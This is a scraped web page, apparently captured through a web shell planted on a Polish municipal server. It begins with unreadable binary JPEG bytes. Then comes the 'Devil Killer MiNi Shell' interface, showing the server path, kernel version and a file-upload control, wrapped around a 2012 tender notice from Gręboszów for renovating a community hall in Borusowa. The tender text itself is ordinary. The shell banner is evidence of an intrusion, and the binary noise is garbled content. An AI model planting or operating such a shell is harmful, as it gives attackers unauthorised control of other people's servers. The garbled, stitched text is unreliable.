JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120203/33280-N-2012.html

<p class="kh_header"><b>Gręboszów: Remont Domu Ludowego w Borusowej</b><br>
<b>Numer ogłoszenia: 33280 - 2012; data zamieszczenia: 03.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Domu Ludowego w Borusowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest Remont Domu Ludowego w Borusowej.
  2.  Zakres robót budowlanych obejmuje: 
       I. Remont  i wyposażenie Domu Ludowego w Borusowej:
1)	 Stolarka okienna  56,61 m2
2)	 Stolarka drzwiowa wewnętrzna  40,22 m2 
3)	 Stolarka drzwiowa zewnętrzna   24,40 m2 
4)	 Posadzki  345 m2 
5)	 Okładziny  ścian  90,61 m2
6)	 Malowanie z przygotowaniem podłoży ścian i sufitów  1122,27 m2
7)	 Izolacja stropu nad piętrem (na poddaszu)  231,75 m2 
8)	 Izolacja stropu parteru  91,45 m2
9)	 Malowanie pokrycia dachowego  351 m2
10)	 Kominy   5 szt.
11)	 Elewacja  475,06 m2
12)	 Izolacja pionowa ścian piwnic z odwodnieniem  101,4 m2
13)	 Daszki nad wejściami  4 szt.
14)	 Schody zewnętrzne  13,06 m2
15)	 Wyposażenie kuchni -  elementów  7 szt. (kuchnia gazowa  szt. 1, patelnia elektryczna  szt. 1,  
 zmywarko-wypażarka  szt. 1, zabudowa   kuchenna  szt. 1,  stoły gastronomiczne  szt. 2,  okap kuchenny szt. 1.

16)	 Przybory sanitarne   9 szt. (umywalka szt. 5, zlewozmywak szt. 1,  miska ustępowa szt. 3)
17)	 Instalacje elektryczne - punkty grzewcze    21 szt.
18)	 Instalacje elektryczne - punkty oświetlenia   47 szt.
19)	Instalacja elektryczna - syrena 1 szt.
20)	Instalacja  odgromowa - 1 szt.

II. Mała architektura:
     1)   wyposażenie małej architektury - elementów 15 szt.  (ławki parkowe - szt. 5, kosze parkowe - szt. 6, 
            neon z napisem - szt. 1, tablica informacyjna (min. 1,5 m2) - szt. 1, stojaki rowerowe (pięciostanowiskowe) - szt.2)
III. Zagospodarowanie terenu :
   1)   Podjazd, chodnik, opaska chodnikowa - nawierzchnia 543 m2
   2)   Oświetlenie placu rekreacyjnego  - punkty oświetleniowe 4szt.
IV. Kształtowanie terenów zielonych:
1)	Roboty w zakresie kształtowania terenów zielonych - powierzchnia 340 m2
 V.   Inwentaryzacja geodezyjna  powykonawcza  ( 0,20 ha)   - 1 szt.

3.  Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji projektowej, specyfikacjach 
     technicznych wykonania i odbioru robót, które są dostępne w wersji elektronicznej na stronie internetowej 
     Zamawiającego i stanowią załączniki do niniejszej SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Remont Domu Ludowego w Borusowej.  Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50 % wartości zamówienia podstawowego (art.67 ust.1 pkt 6 ustawy Pzp.).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-1, 45.43.00.00-0, 45.44.00.00-3, 45.43.00.00-4, 45.44.21.00-8, 45.31.00.00-3, 45.33.00.00-9, 45.42.00.00-7, 45.11.13.00-1, 45.26.10.00-4, 45.32.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.    Zamawiający żąda od Wykonawców  wniesienie wadium  przetargowego w kwocie 10 000,00 zł, 
           słownie: dziesięć tysięcy  złotych, które winno być wniesione  przed upływem terminu składania 
           ofert. 
    2.    Wadium może być wniesione w jednej  lub w kilku  następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9 listopada 2000 r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 ze zm.).
    3    Wadium wnoszone w pieniądzu należy wpłacić  przelewem na rachunek  bankowy Zamawiającego: Konto 
          Nr  33 94621013 2004 4000 1498 0006  Bank Spółdzielczy w Dąbrowie Tarnowskiej, Oddział 
          Gręboszów z dopiskiem Wadium do przetargu - Remont Domu Ludowego w Borusowej .  
    4.    W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu wadium 
           na  rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
    5.   W przypadku wnoszenia przez Wykonawcę wadium w formie określonej w ust.2 pkt 2-5 zobowiązany 
           jest on dostarczyć Zamawiającemu oryginał właściwego dokumentu poręczenia lub gwarancji przed 
           upływem  terminu składania ofert i złożyć go w siedzibie Zamawiającego w pokoju nr 11 - sekretariat, 
           a do  oferty  dołączyć kopię przedmiotowego dokumentu potwierdzoną za zgodność z oryginałem przez 
           Wykonawcę.  Wymagana ważność wadium w formach innych niż pieniężna  minimum - 30 dni od daty 
           składania ofert. Składane przez Wykonawcę wadium w formie niepieniężnej  musi się powoływać w swej 
           treści na przepis   art. 46 ust. 5 ustawy Pzp i być bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne 
           żądanie Zamawiającego.  
    6.    Wniesienie wadium w innej, niż wyżej wskazanej formie zaskutkuje uznaniem iż oferta Wykonawcy nie 
           jest właściwie  zabezpieczona   wadium, a Zamawiający będzie musiał wykluczyć takiego Wykonawcę 
           z postępowania na podstawie art. 24 ust.2 pkt 2 ustawy Pzp.
7.    Wadium wniesione w pieniądzu  Zamawiający przechowuje na rachunku bankowym, które zwraca  wraz 
        z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
        pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy
       na rachunek bankowy wskazany przez wykonawcę.
8.   Zwrot wadium;
       1) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty 
           najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy, którego oferta została 
           wybrana jako najkorzystniejsza,

       2) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium 
            niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia 
            należytego wykonania umowy, jeżeli jego wniesienia żądano,
       3) Zamawiający zwraca  niezwłocznie wadium, na wniosek  Wykonawcy, który wycofał ofertę przed 
            upływem terminu składania ofert.
    9.   Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium 
            na podstawie  ust.8 pkt 1 SIWZ, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została 
            wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
  10.    Zatrzymanie wadium;
       1) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym 
            mowa w art. 26 ust. 3ustawy Pzp, nie złożył  oświadczeń lub dokumentów, o którym mowa  w art. 25 ust.1ustawy 
            Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących  po jego stronie. 
2)	 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
               a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
         b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
               c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie 
                   Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie   Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna złożenie przez Wykonawcę oświadczenia o spełnieniu warunku udziału w postępowaniu według załącznika nr 2 do SIWZ oraz Wykonawca wykaże się, że zrealizował (zakończył) co najmniej dwie roboty budowlane polegające na: budowie, przebudowie, rozbudowie, odbudowie lub remoncie obiektu budowlanego o kubaturze nie mniejszej niż 2000 m3  oraz  o wartości nie mniejszej niż 500 tys. zł brutto  każda,
 i zostały wykonane w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, z podaniem ich rodzaju  i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 



                       Wartości robót podane w dokumentach w walutach innych niż wskazane przez Zamawiającego powinny przez Wykonawcę przeliczone według średniego kursu NBP na dzień przed złożeniem  ofert. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/w  wymagania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych 
               wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna złożenie przez Wykonawcę oświadczenia o spełnieniu warunku udziału w postępowaniu według załącznika nr 2 do SIWZ oraz Wykonawca wykaże się, że dysponuje lub dysponować będzie osobami legitymującymi się kwalifikacjami zawodowymi, doświadczeniem
              odpowiednim dla funkcji, jakie zostaną im powierzone. 
Wykonawca przedstawi w ofercie kandydatów  na każde stanowisko wymienione poniżej:
              a)  kierownika budowy - osobę, która pełniła funkcje kierownika budowy przy minimum  dwóch robotach 
                   budowlanych polegających na budowie, przebudowie, rozbudowie lub odbudowie lub remoncie obiektów 
                   budowlanych o kubaturze co najmniej 2000 m3, załączeniem dokumentu potwierdzającego.
b)  kierownika robót w specjalności instalacyjnej w zakresie, takim  jak: instalacje wod-kan, gaz, 
              c)  kierownika robót w specjalności instalacji i urządzeń elektrycznych  i elektroenergetycznych.
              Osoby pełniące samodzielne funkcje budownictwie winny posiadać uprawnienia budowlane i przynależeć do  
              właściwej izby  samorządu   zawodowego  oraz  posiadać  aktualne ubezpieczenie od odpowiedzialności cywilnej.
              Zamawiający,    określając wymogi dla  osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza 
              odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących 
              przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru  
              Gospodarczego  oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy  
              Prawo budowlane (tekst  jednolity. Dz.U. z 2006 r. nr 156, poz. 1118 ze zm.) oraz ustawy o zasadach   
              uznawania kwalifikacji zawodowych  nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r.
              nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna złożenie przez Wykonawcę oświadczenia o spełnieniu warunku udziału w postępowaniu według załącznika nr 2 do SIWZ oraz Wykonawca wykaże się posiadaniem  ubezpieczenia  od odpowiedzialności cywilnej w zakresie  prowadzonej działalności gospodarczej  na kwotę nie mniejszą  niż
700 tys. zł i dysponować środkami finansowymi lub zdolnością kredytową na kwotę nie mniejszą niż 350 tys. zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia umowy Zamawiający zawarł we wzorze  umowy stanowiący  załącznik nr 8 do  SIWZ.  
2.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,
 na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	Zmiana terminu realizacji przedmiotu umowy;
a)	Zaistnienia po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej:
-  o charakterze  niezależnym od Stron,
-  którego Strony nie mogły przewidzieć przed zawarciem umowy, 
-  którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności, -  -  której nie można przypisać drugiej Stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
             b) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,  w szczególności; 
                 wstrzymanie robót przez Zamawiającego;
             c) inne przyczyny zewnętrzne niezależne od  Zamawiającego oraz Wykonawcy skutkujące   niemożliwością 
                 prowadzenia prac, np.: będące następstwem działania organów administracji;  
            d) wystąpienia istotnych wad dokumentacji projektowej, skutkującej koniecznością dokonania poprawek lub 
                 uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizacje określonego rodzaju robót mających 
                 wpływ na zmianę terminu realizacji;    
             W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania
             umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania 
             jej przedmiotu, nie dłużej jednak niż o okres trwania tych okoliczności.
2)	Zmiana sposobu spełniania świadczenia;
   a) zmiany stanu prawnego w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany 
       sposobu wykonania  zamówienia przez Wykonawcę.
b) konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub 
    materiałowych  niż  wskazane w dokumentacji projektowej w sytuacji, gdyby zastosowanie  przewidzianych 
    rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem  przedmiotu  umowy albo ich zastosowanie 
    byłoby  korzystne dla Zamawiającego lub ze względu na zmiany obowiązującego prawa.
    Zmiana ta będzie wprowadzona wyłącznie w zakresie umożliwiającym oddanie przedmiotu  umowy do 
    użytkowania, a Zamawiający nie może ponieść ryzyka zwiększenia wynagrodzenia z tytułu takich zmian.
